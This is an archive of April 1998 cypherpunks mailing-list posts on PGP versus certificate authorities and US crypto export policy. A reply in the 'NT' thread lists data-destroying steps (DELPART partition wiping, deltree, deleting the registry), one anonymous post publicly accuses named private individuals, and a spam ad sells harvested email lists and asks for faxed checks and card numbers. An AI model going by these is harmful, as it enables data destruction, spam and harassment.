>> accessible that people just go nuts, doing things with it and taking it
>> places no one ever dreamed. That's how Apple catalyzed the transformation
>> of the publishing industry. Requiring a CA to make DigiSign work simply
>> made this impossible. A peer to peer model, allowing people to create and
>> sign their own certificates would have been far more appropriate for
>> Apple's creative users.  Then came PGP...
>
>I think Mark makes a mistake in confusing pre-conditions for market
>acceptance with requirements for market growth.
>
>From the perspective of someone who helped the Web grow from a userbase
>of less than 100 users I have my own ideas as to why Apple did not
>succeed with its powertalk architecture. I see the lack of commitment
>to open standards as the key factor.
...
>But just because CAs may be dispensed with in a system of 10,000
>odd users whose principal concern is confidentiality does not mean
>they have no role in a system of over 1 million users where the
>legal enforceability of a signed contrat is an issue.
...
>The other shortcomming of Apple's approach was not realising
>that there is a middle ground. To take an example most people...

Lack of commitment to open standards was made obvious by the fact that
Apple considered the POP/SMTP plug-in for PowerTalk to be a 3rd party
opportunity! However, I was only really talking about the DigiSign stuff,
trying not to get sucked into the whole enchalada of discussing why
PowerTalk failed.

I have no bone to pick with the CA model. Apple was stuck at the high end
of this model when, as Phill points out, many levels of authentication are
needed.

I simply think that starting with a personal model, more like PGP, would
have allowed DigiSign to build some momentum, at least in the Mac market
(not a bad place to start). So, it was in fact a pre-condition for market
acceptance. Market growth could have been accelerated by just paying
attention. As with many Apple technologies, there was never a version 2.0
and 3.0 and so on, to correct for the misconceptions about the market. A
lot of people knew what needed to be done, but management usually remained
clueless.

Mark







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 15 Apr 1998 14:09:06 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Commerce Secretary attacks crypto export limits
Message-ID: <6B5344C210C7D011835C0000F8012766010036A3@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.news.com/News/Item/0,4,21120,00.html?st.ne.fd.mdh


Crypto policy called a failure 
By Courtney Macavinta
Staff Writer, CNET NEWS.COM 
April 15, 1998, 11:40 a.m. PT 
URL: http://www.news.com/News/Item/0,4,21120,00.html 

The government's policy restricting the export of strong encryption products
has failed and is boosting the foreign market by hog-tying the U.S.
industry,
Commerce Department secretary William Daley conceded today.

[...]

But the software industry and privacy advocates were most intrigued today by
Daley's admission that the administration's export limits on encryption
(technology that secures digital communication) are hindering U.S.
companies'
ability to compete with global manufacturers.

The export policy went into effect last January, and is overseen by the
Commerce Department. Under the rules, software makers that are granted
crypto export licenses must submit proof of their plans to build
key-recovery
features into their products after next year. Key-recovery systems make it
possible for law enforcement agents--who have obtained a court order--to
access computer users' private key that unscrambles their digital messages
or
files.

"The ultimate result will be foreign dominance of the market," Daley said.
"This means a loss of jobs here, and products that do not meet either 
our law enforcement or national security needs."

There has been an ongoing fight to overturn the export limits. But a
compromise hasn't been reached with law enforcement officials, who assert
that access to keys is needed to combat a new wave of high-tech crime in
which suspects can cover their tracks with crypto.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 12:10:17 -0700 (PDT)
To: KTEHCorporate@kteh.pbs.org
Subject: Re: Gary L. Burnore, Registered Sex Offender in Raleigh, NC
In-Reply-To: <6gfuqv$82u$3@pinta.pagesz.net>
Message-ID: <199804151909.VAA11531@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


beep@ix.netcom.com (Pamela Gross) wrote:

> >You're conveniently omitting a few details.  He's not just "accused", but
> >he was CONVICTED.  His right to privacy went away when he committed a crime
> >and was PUBLICLY tried and convicted by a court in Santa Clara, CA.  That
> >conviction is a public record, just like Ron Guilmette's tax lien that
>      
> Is this who you are?      
>      
> What exactly is a tax lien?  Why did Gary post yours?  Were you having
> a fight of some kind?

Actually Gary Burnore's original beef was with an anonymous whistleblower
who notified the victim's mother and school officials of Gary's pedophelia
before he was ever arrested for it.  (How would a mere troublemaker out to
allegedly "harass" poor Gary have even known about Gary's sexual exploits
before they became public?  And how would he/she have known the identity of
the victim which is still non-public information?)  Back then he was
accusing the poster of "libelling" him and "harassing" the victim.  The
situation only became public when Gary chose to publicly accuse an
anonymous usenet poster of being the same person who had sent the private
e-mails which tipped off the victim's mother and high school principal.

Unable to track down the whistleblower and subject him/her to the typical
DataBasix sort of harassment, he attacked the remailer that was being used,
instead.  See:

  http://infinity.nus.edu.sg/cypherpunks/dir.97.11.13-97.11.19/msg00432.html

And, yes, one of Gary's forms of harassment against another person was to
dig up a 10 year old tax lien on the individual and post it to usenet in an
attempt to embarass him and intimidate him into silence with the threat
"there more where that came from".  See:

  http://infinity.nus.edu.sg/cypherpunks/dir.97.11.13-97.11.19/msg00424.html

When the victim's mother evicted Gary Burnore from her home and eventually
advertised for a new roomate in the ba.market.housing NG back on 5/8/97,
someone made a followup remark on 6/5/97 which said:

  "XXXXX finally booted her pedophile boyfriend, Gary L. Burnore, out of the
   house!  Last I heard, he was high tailing it for Raleigh, NC."
   
Note that this was well before Gary ever registered as a sex offender in
NC.  Gary, never able to able to leave well enough alone, just had to
follow up on the post, even though he has wisely chosen to have DejaNews
delete his reply.  I'm wondering if Gary is worried that someone will
expose the fact that his girlfriend with whom he was living and sleeping
and whose daughter he molested was also a high-ranking official at a public
television station which did business with Gary L.  Burnore's company
DataBasix.  Was that conflict of interest ever disclosed?

And since this is the same Gary Lee Burnore who used to confidently declare
"I have nothing to hide", I guess it was assumed he wouldn't mind if the
truth about him and his sexual quirks were revealed using publicly-available
records posted on a public website by the state of North Carolina.

And, no, I'm not any of the individuals named above.

Careful, Gary.  False accusations of libel might just motivate some people
to prove that the allegedly libellous statement were, in fact, true.  You
apparently bluffed and lost.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Apr 1998 18:31:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Commerce Report on the Digital Economy
In-Reply-To: <199804142337.TAA04838@camel7.mindspring.com>
Message-ID: <199804160130.VAA26172@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Jay Holovacs we've put Daley's press conference
remarks and an executive summary of the "The Emerging
Digital Economy" at:

    http://jya.com/daley-ecom.htm

And we offer the main text of the full report at:

    http://jya.com/emerg-dig.htm  (164K, plus 11 images)

It's available from Commerce in separate HTML chapters 
or the full text with appendices in PDF (300 pages) at:

   http://www.ecommerce.gov/emerging.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Romulo Moacyr Cholewa" <rmcholewa@bigfoot.com>
Date: Wed, 15 Apr 1998 21:59:01 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: RE: NT
In-Reply-To: <19980416032558.6663.qmail@nsm.htp.org>
Message-ID: <003e01bd68f4$412b7d40$0100a8c0@pioneer.rmc1.com.br>
MIME-Version: 1.0
Content-Type: text/plain


Yes, that's easy...

Just drop it from a 1 meter down straight fall... :-)))

... or simply run DELPART and erase any partitions on the disks...

... or install a separate copy of NT in another folder and run deltree

... or go into \CONFIG and delete the registry

...


There are a thousand ways to acomplish that... can you be more specific ?

:-)))

Best Regards,

Romulo Moacyr Cholewa

> -----Original Message-----
> From: owner-cypherpunks@toad.com [mailto:owner-cypherpunks@toad.com]On
> Behalf Of nobody@nsm.htp.org
> Sent: Quinta-feira, 16 de Abril de 1998 00:26
> To: cypherpunks@toad.com
> Subject: NT
> 
> 
> Anyone know how to completely crash a NT
> workstation with no possibility of recovery?
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Wed, 15 Apr 1998 20:34:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NT
Message-ID: <19980416032558.6663.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know how to completely crash a NT
workstation with no possibility of recovery?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
Date: Thu, 16 Apr 1998 00:30:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: Apple crypto engineer position available
Message-ID: <d3ec812823ea7f1657a261d7d54aea84@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain


>PGP cut the gordian knot and demonstrated that it was _possible_
>to have a successful PKI application without a CA. But that is not
>to say that a trusted third party cannot add value to an
>application. PGP validated PKI generally but it did not invalidate
>the CA concept - in the PGP system everyone is a trust provider,
>everyone is in that sense a CA.

PGP did in fact invalidate CA concept, very successfully. There is a
world of difference between "everyone is a trust provider" and several
centralized CAs.

Authentication is an essential part of security. If one assumes wrong
who she is talking to then all "strong crypto" used is irrelevant, since
the middleman is browsing the plaintext.

If there is a need, CA customers will be given middleman's keys and all
traffic will be systematically captured, re-encrypted and forwarded to
the intended recipient for as long as required. Maybe even keys with the
same hash (id) can be generated to pass the verification. What percentage
of users would do the non-automated, manual check anyway ?

If trusting a secret key to escrowing entity (GAK) is a bad deal, how is
trusting someone's identity to CA any different ? In both cases security
is deposited with an organization that can be influenced in any number of
ways.

The CA concept does not work because security and privacy are inherently
individual, and any forced insertion of third parties in the process is
bound to miserably fail.

The Fool








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 16 Apr 1998 02:53:56 -0700 (PDT)
To: nobody@nsm.htp.org>
Subject: RE: NT
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2027903@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, lots of people know.  Mostly the ones who've read the NT manuals.

> ----------
> From: 	nobody@nsm.htp.org[SMTP:nobody@nsm.htp.org]
> Sent: 	16 April 1998 04:25
> To: 	cypherpunks@toad.com
> Subject: 	NT
> 
> Anyone know how to completely crash a NT
> workstation with no possibility of recovery?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 21:09:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Entropy Gradient Reversals
Message-ID: <199804160409.GAA24943@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.rageboy.com/allthewords.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Thu, 16 Apr 1998 07:07:32 -0700 (PDT)
To: nobody@nsm.htp.org
Subject: Re: NT
In-Reply-To: <19980416032558.6663.qmail@nsm.htp.org>
Message-ID: <Pine.BSF.3.96.980416070712.15646B-100000@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Liberal application of the "Sledgehammer" virus.

On 16 Apr 1998 nobody@nsm.htp.org wrote:

> Anyone know how to completely crash a NT
> workstation with no possibility of recovery?
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 16 Apr 1998 05:02:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT on Daley Deal
Message-ID: <199804161202.IAA19810@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, April 16, 1998, p. D2.

   Commerce Secretary Seeks Compromise on Encryption

     Administration Reconsiders F.B.I. Position

   By Jeri Clausing

   Washington, April 15 -- The Clinton Administration's attempts to
   control encryption technology have been a failure and are forcing
   American software makers to concede ground to foreign
   competitors, Commerce Secretary William M. Daley said today.

   Mr. Daley's remarks, made in a speech here to the high-technology
   industry, were the strongest indication yet that the
   Administration was seriously considering parting ways with Louis
   Freeh, the Director of the Federal Bureau of Investigation, and
   other law enforcement and spy agencies over the issue of how data
   should be scrambled.

   "We are headed down a lose-lose path, and we have to get back to
   win-win," Mr. Daley said. He blamed both industry and law
   enforcement officials for the failed policy, saying that the two
   sides had failed to find a reasonable compromise between the need
   to monitor the activities of criminals and the need to offer
   consumers strong security for on-line transactions.

   The purpose of his speech today was to release the Commerce
   Department's first comprehensive report on the impact of
   electronic commerce on the nation's economy. The report shows
   that information technology, including business on the Internet,
   is growing twice as fast as the overall economy, employing some
   7.4 million workers at salaries 64 percent above the national
   average.

   But while the report was full of impressive numbers and glowing
   predictions for the future, Mr. Daley said that strong encryption
   and a solid encryption policy were essential if electronic
   commerce was to realize its full potential.

   Mr. Daley's blunt comments marked the first public acknowledgment
   that the Clinton Administration's encryption policy had failed.
   And his remarks echoed what the industry has contended for years
   -- that foreign companies are fast taking over the high-demand
   market for products that protect the privacy of communications.

   The software industry is currently prohibited from exporting
   strong encryption programs, which scramble data in ways that make
   it difficult or impossible for unauthorized people -- including
   law enforcement agencies -- to decode. Such software is essential
   to electronic commerce, which requires that credit card
   information and other private data be encrypted when products are
   ordered on the Internet.

   The software industry has long argued that the export rules put
   American companies at a great disadvantage relative to foreign
   competitors not under such restrictions. Mr. Freeh and the
   National Security Agency argue that the threat of terrorists and
   other criminals scrambling data to thwart law enforcement is so
   great that the export restrictions should be removed only if the
   police are given keys to unlock encrypted data.

   At the end of 1997, Mr. Daley said, an estimated 656 encryption
   products were being produced in 29 countries outside the United
   States. Products from Germany, Ireland, Canada, Israel and
   Britain can compete with anything made domestically, he said, and
   can meet the needs of the world's computer networks.

   "Our policy, ironically, encourages the growth of foreign
   producers at the same time it retards growth here," Mr. Daley
   said. He called for a sincere dialogue between industry and law
   enforcement, but stopped short of saying that the Administration
   would withdraw its support of the F.B.I. and N.S.A. position.

   "There are solutions out there," Mr. Daley said. "Solutions that
   would meet some of law enforcement's needs without compromising
   the concerns of the privacy and business communities. But I fear
   our search has thus far been more symbolic than sincere.

   "The cost of our failure will be high. The ultimate result will
   be foreign dominance of the market. This means a loss of jobs

   here, and products that do not meet either our law-enforcement or
   national security needs."

   Mr. Daley declined to offer examples of what the Administration
   might be willing to give up to reach an agreement.

   Industry officials, however, said there was no room for
   compromise.

   "People want complete privacy," Peter F. McCloskey of the
   Electronic Industries Alliance said.

   Harris N. Miller, president of the Information Technology
   Association of America, said that companies were willing to
   continue discussions with the Administration, but he asserted
   that Government officials "think compromise is something in the
   middle; sometimes compromise is found outside of the box."

   Mr. Miller said that the solution needed to be a technical one,
   perhaps one that gave law enforcement better training and
   equipment to crack encrypted criminal communications without
   requiring that everyone hand over spare keys to their computer
   files.

   "Law enforcement has legitimate concerns," Mr. Harris said. "What
   we disagree with is their demand for unlimited access."

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FRIEND@hotmail.com
Date: Thu, 16 Apr 1998 07:15:20 -0700 (PDT)
To: anyplace@juno.com
Subject: FINALLY, FRESH & CLEAN !!
Message-ID: <199804161335.TAA14220@sbtx.tmn.ru>
MIME-Version: 1.0
Content-Type: text/plain


IT WAS JUST RELEASED!!

INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the 
touted CD's that are out there (bought them all - some were $300+)!  
We added the millions we had in storage to those.   When we 
combined them all, we had in  excess of 100+ million addresses 
in one huge file. 

We then ran a super "sort/de-dupe" program against this huge list. 
It cut the file down to less than 25 million!!! Can you believe that? It 
seems that most people that are selling CD's are duping the public 
by putting numerous files of addresses in the CD over and over. This 
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc. 
This causes a tremendous amount of undeliverables, and for  those 
that use Stealth programs, clogs up servers quickly with trash, etc. 

We then ran a program that contained 150+ keywords to remove 
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu, 
.mil, .org, .gov, etc.   After that list was run against the remaining list, 
it  reduced it down to near 16 million addresses! 

So, you see, our list will save people hundreds of dollars buying all 
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and 
alot less time!!  

We also purchased Cyber-Promos ($995.00) CD.   We received it just 
prior to finishing production work on the new CD.   We had our people 
take a random sample of 300,000 addresses  from the touted 2.9 that 
they advertised.   We used a program that allows us to take a random 
sample of addresses from any list.   We were able to have the program 
take every 9th address, thus giving us a 300,000 list of Cyber's email 
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000 
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be. 

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes. 


 "You can buy from the REST or you can buy from the BEST.   Your choice. 
_____________________________

What others are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I 
immediately started bulking out using the new email addresses.  Over 
the course of the weekend, I emailed out over 500,000 emails and I 
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX


"This list is worth it's weight in gold!!  I sent out 100,000 emails for my 
product and received over 55 orders!  

Ann Colby
New Orleans, LA


****************************************

                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files). 
All files are separated by domain name for your convenience.

PLUS you receive a tremendous REMOVE list!

AND

the a sampling of CyberPromo's HOT list.
 
>>> NOW ONLY $149.00!   

This price is effective for the next seven days, thereafter the price will be 
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual 
basis, add New Names and Remove Undeliverables and Remove 
Requests.   

The result is the Cleanest Email Addresses Available Anywhere 
to use over and over again, for a FRACTION of the cost that other 
companies charge. Typical rates for acquiring email lists are from 
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most 
effective way to market anywhere..PERIOD!



To order our email package, simply print out the EZ ORDER FORM 
below and fax or mail it to our office today.

We accept Visa, Mastercard, Discover, Checks by Fax and Mail.

_________________
EZ Order Form 
 

_____Yes! I would like to order MILLIONS Vol. 1 email addresses 
for only $149.00.
 

*Please select one of the following for shipping..

____I would like to receive my package OVERNIGHT. I'm including 
$15 for shipping. (outside US add an additional $25 for shipping)

____I would like to receive my package 2 DAY delivery. I'm including 
$10 for shipping.  (outside US add an additional $25 for shipping)



DATE_____________________________________________________

NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________

PHONE NUMBERS__________________________________________

FAX NUMBERS_____________________________________________

EMAIL ADDRESS___________________________________________



TYPE OF CREDIT CARD: 

______VISA _____MASTERCARD

CREDIT CARD# __________________________________________

EXPIRATION DATE________________________________________

NAME ON CARD___________________________________________

AMOUNT $____________________
 

(Required) SIGNATURE:x________________________

DATE:x__________________


You may fax your order to us at:   1-704-784-5595

CHECK BY FAX SERVICES!

If you would like to fax a check, paste your check below and fax it to 
our office along with all forms to: 1704-784-5595

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR 

CHECK HERE AND FAX IT TO US AT 1-704-784-5595


*******************************************************

If You fax a check, there is no need for you to send the original check. 
We will draft up a new check, with the exact information from your 
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail, 
please send all forms and Check or Money Order to:

CONSUMER CONNECTIONS
10223-B UNIV. CITY BLVD. #197 
CHARLOTTE, NC  28213






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chatski carl <chatski@gl.umbc.edu>
Date: Thu, 16 Apr 1998 05:31:41 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: Re: The Great Internet Bandwidth Crisis
In-Reply-To: <199804160919.LAA02218@basement.replay.com>
Message-ID: <Pine.SGI.3.96.980416083052.23885H-100000@umbc10.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Apr 1998, Anonymous wrote:

> It seems to me that the chief impediment standing in the way of the
> Internet becoming a propaganda and marketing tool suitable for use
> and control by a few rich and powerful business entities is the 
> comparatively inexpensive and easy access of millions of users to
> the same technologies available to megacorporations.
> 
> History itself leads me to suspect that the money and power moguls
> will use a variety of real and imaginary issues to place greater
> monetary burdens and access restrictions on many aspects of the
> Internet and Web, particularly those that have commercial potential.
> 
> A current example is the attempt by various Telecos to raise the cost
> of access for other businesses, citing alleged burdens placed on their
> resources by ISPs at the same time that they are scrambling to enter
> the same market by undercutting their competitors.
> The Great Teleco Resource Crisis will undoubtedly be mirrored at some
> point in the future by the Great Internet Bandwidth Crisis. I suspect
> that although it will be as bogus as the Telecos' current imaginary
> crisis, it will come at a time when the major players have divided up
> enough of the infrastructure pie among themselves to be unanimous in
> their nod-and-wink agreement as to the severity of the crisis.
> 
> Undoubtedly, this will be just one of a variety of crisis in which 
> will require restrictive legislation and cost-increasing regulations
> that will save bandwidth for future children and protect adult citizens
> from the extreme danger of engaging in commerce with other average
> adult citizens such as themselves.
> It seems to me that the *only* way that the Internet can be kept from
> being used as just another tool for herding the masses into larger and
> more efficient feeding pens is to enable and empower the citizens to
> freely and safely control their own financial and commercial destiny
> in their Internet transactions.
> The more accessible and widespread the control over one-to-one monetary
> transactions, the more difficult it will be for a few entities to lead
> the citizens around by financial rings run through their noses.
> 
> The government currently has a variety of budgetary axes held over the
> heads of the citizens, such as federal funding and grants in which
> money taken away from the citizens is returned to them on a statewide,
> local or individual basis only upon conditions that involve giving up
> rights and liberties that are due them.
> 
> In order to resist being herded by a myriad of legal, licensing and
> regulatory 'axes' into increasingly global feeding pens, the citizens
> will need access to tools which allow secure financial transactions with
> differing levels of identity versus anonymity available to them.
> 
> The reason that major business has not yet been able to divide up the
> financial pie available through the Internet is the excessive amount
> of resources that they need in order to compete for the attention of
> Internet users, given that average citizens are providing equal or
> better information and services for free or for a low cost.
> The sooner that the masses are able to engage in free commerce with
> one another via the Internet--whether it be giving Grandma Jones a
> dollar for her cookie recipies, or engaging a student across the
> continent in private research in return for money, for goods or 
> for services--then the sooner the masses will scream loud and long
> when government or corporate entities threaten to take this ability
> to be self-sufficient away from them.
> 
> Those who wish to circumvent the loss of privacy, liberty and freedom
> that they forsee as being possible on the Internet need to realize 
> that most of those who are not currently empowered to manifest those
> possibilities in their individual life will little recognize or
> protest the 'present' loss of those 'future' possibilities.
> Unless there is a widespread dissemination of working tools accessible
> to the average citizen, then the future will be controlled by those
> with the funds and resources to limit financial transactions on the
> Internet to a self-defined 'way things are.'
> 
> "Teach a man to buy his fish from you, and you'll feed yourself for
>  a lifetime."
> 
> 

- Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 23:43:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BioInfoWarFare? / Re: sorry
Message-ID: <199804160643.IAA12778@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Hedges wrote:
> >    *sigh*  actually, that wasn't bad english, it was just accidental
> >html email....i didn't realize netscape would do that and i apologize.
> >ooooooooooooooooo
> >colin                 the feeling that its
> > cjm1@execpc.com      all a lot of oysters
> >maroney          and no pearls.
> >ooooooooooooooooo
> 
> It's 'it's', not 'its'.
> 
> Good English does not coherence generate.

Sounds like a biological agraphia warfare attack, followed by a logic
bomb...
Hhmmm...I smell a Platypus?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 23:45:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hackworth
Message-ID: <199804160645.IAA12946@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


AN AMBUSHED MARINE

        Have a look at the following. A loyal, heroic Marine is being
fed to the
sharks.

        A letter to your congress person and the Commandant of the
Marine Corps,
with an info copy to your local newspaper, would help.

        For those who might want to help a good Marine financially he
would be
forever grateful.

Tim Witham Legal Defense Fund
c/o Robert Ferris
Box 538
Jacksonville, NC  28541

        SEMPER FI and perhaps the top brass in the Corps should refresh
themselves
as to what this wonderful expression  means.

Hack

14, March 16, 1998
NATION: "Criminal Injustice?"

        To judge from his military paper trail, Marine Sergeant Timothy
Witham, a
33-year-old Explosives Ordnance Disposal (EOD) specialist, is the
embodiment of the Corps. A veteran of Desert Shield/Desert Storm, Witham
has also served with distinction in Somalia. Superlatives suffuse his
service record: "Sergeant Witham's professional achievement, initiative
and
loyal dedication to duty ... reflected great credit upon himself and were
in
keeping with the highest traditions of the Marine Corps and the United
States Naval Service," declared Lt. Colonel G.C. Cutchall in a citation
issued when Witham received the Navy Achievement Medal.

        In a letter endorsing Witham's application to become a Warrant
Officer
Candidate, Lieutenant Colonel E.M. Smith, his former commanding officer
at
North Carolina's Cherry Point Marine facility, praised Witham's
"seasoned
leadership ... high degree of maturity ... poise, understanding and tact."
In
addition to his military service, Witham has also excelled in joint
projects with civilian agencies, according to Smith: "He has established
a
tremendous rapport with outside agencies such as the FBI, various ATF
state
bureaus, Secret Service, DEA and other police agencies." Witham's
dossier
includes a certificate of appreciation from the Secret Service for his
work
as part of a presidential security detail at the 1996 Atlanta Olympics.
He
was also entrusted with similar security responsibilities during the
1994
Middle East peace talks and the UN's 50th anniversary in 1995.

Abrupt Change of Heart

        Noting that Witham is "loyal, displays sound judgment, and is
exceptionally reliable and trustworthy," Lt. Col. Smith recommended his
application "with utmost enthusiasm." Witham's current commanding
officer,
Lieutenant Colonel J.G. Ayala of Marine Wing Support Squadron 271,
offered
a similarly glowing endorsement last September. "[Witham] leads from the
front. Superior knowledge of the EOD field. Can handle any mission and
looks forward to challenging assignments," declared Ayala. "[Witham is
a]
true asset to his section and to this Squadron. His knowledge and
expertise
would make [him] an outstanding candidate for the warrant officer
program."

        However, Ayala's opinion of Witham underwent an abrupt change
just a few
weeks later. "SSgt. [Staff Sergeant] Witham has proven that he is a
threat
to the good order and discipline of the Squadron and the U.S. Marine
Corps," insisted Ayala in an October 17th memo. Ayala's radical
reevaluation of Witham followed the October 16th arrest of Witham and
five
other Marines as a result of "Operation Longfuse," a 16-month joint
sting
operation conducted by the FBI, the ATF, and the Naval Criminal
Investigative Service (NCIS). Witham found himself accused of
"transporting
a loaded weapon on base; conspiracy to commit larceny; larceny of
military
explosives, equipment, and firearms; wrongful disposition of military
property; receiving stolen property; [and] federal firearms and
explosives
violations under the Federal Assimilated Crimes Act."

        Upon his arrest, Witham was designated "a flight risk," which
led Ayala to
support "continued confinement" until his pre-trial hearing - which
turned
out to be a 79-day jail term. "Lesser forms of restraint would be
inadequate to insure that he would appear at his hearing and
court-martial," insisted Ayala. "This is not the first time that SSgt
Witham has been involved in this type of incident." Curiously, in the
same
memo, Ayala noted that there had never been any previous disciplinary
action taken against Witham - which would suggest a serious delinquency
on
the part of his superiors if Witham had indeed been "involved in this
type
of incident" on earlier occasions. Just as curious is the fact that Form
1070 in Sergeant Witham's personal file, which lists "offenses and
punishments," is entirely blank.

        Literally in a single day, a model Marine with an unblemished
record was
transmuted into a felonious arms smuggler whose motivations were equal
parts greed and radical "anti-government" views. Federal and military
investigators have yet to find a particle of material evidence to prove
that Sergeant Witham is the criminal they describe; their case depends
entirely upon the testimony of three eminently impeachable witnesses - a
twice-convicted perjurer, a civilian ex-convict, and an ex-Marine of
dubious integrity who served as a "confidential informant" for the feds
during the undercover operation. Two of the witnesses peddled their
testimony against Witham in exchange for lighter sentences. The
"confidential informant" made an even better deal: He arranged for
complete
immunity before beginning his undercover work, and since October 17th he
has been taken into the witness protection program.

        Last September, Staff Sergeant Timothy Witham was chosen from 20
very
qualified candidates to become a Warrant Officer; now, after spending 79
days in jail, he faces the prospect of an April court-martial. Robert
Ferris, a retired Marine officer and former commanding officer to
Witham,
told The New American: "I spent 24 years in the military, in the Army
and
Marines, and I've never seen an abuse of power to compare with the
treatment of this young man. He should be at Quantico going to school to
become a Warrant Officer, and yet he's exhausting his life savings and
seeing his career destroyed because the feds need to convict somebody to
make a political point." The "political point" being made in the case of
Tim Witham appears to be that mere suspicion of "anti-government" views
is
enough to destroy the career of a model military man.

Extremist Spin

        The "Longfuse" investigation cast a net across several states,
pursuing
leads as far south as North Carolina and as far north as Massachusetts.
Fourteen suspects were arrested on October 17th - eight civilians and
six
Marines, including four stationed at Camp Lejune. Over the course of a
year
and a half, undercover investigators, focusing their efforts on gun
shows,
military bases, and gun dealers throughout the southeast, had purchased
an
estimated 150 pounds of plastic explosives, grenades, grenade launchers,
shoulder-launched rockets, a handful of anti-personnel mines, and more
than
50 machine guns. In the post-Oklahoma City bombing environment, the
preferred spin of federal investigators was entirely predictable.

        Robert Ferris, who is now Witham's next-door neighbor, was a
witness on
Witham's behalf at two preliminary hearings: the "Magistrate's hearing,"
which is held to determine if pre-trial confinement is necessary; and an
"Article 32" hearing, which is the military equivalent of a grand jury.
"The first thing out of the mouth of [military prosecutor] Captain
[Michael] Richardson was 'Ruby Ridge,'" Ferris recalls. "They insisted
that
Tim was part of a ring of anti-government radicals who were stealing
weapons and had sworn not to let the feds take them alive." Thus was
Witham
identified as part of the ubiquitous menace of "right-wing extremism."
Initial press coverage of the "Operation Longfuse" arrests played up the
alleged "anti-government" angle, and the feds did their best to abet
such
speculation - at least in the beginning.

        "Federal agents seized truckloads of stolen military and
civilian weapons
yesterday in an expanding investigation into the theft and sale of
machine
guns, grenades and plastic explosives," screamed the October 18th
Baltimore
Sun. The paper reported that an anonymous investigator portentously
warned
that some of the civilian suspects arrested "have ties - potentially -
to
militia groups." The Raleigh, North Carolina News and Observer carried a
similar warning: "A top official said he could not rule out the
possibility
that anti-government extremists were connected to the theft of military
ordnance from Camp Lejune."

        "These are weapons that are of military use, very lethal
weapons, and they
were weapons that were in the wrong hands," fretted Treasury Department
spokesman Jim Johnson at an October 17th press conference. "That's the
sort
of thing all citizens should be concerned about." Pentagon spokesman
Kenneth Bacon added the disturbing observation that "C-4 was taken,
which
is highly dangerous and used by terrorists."

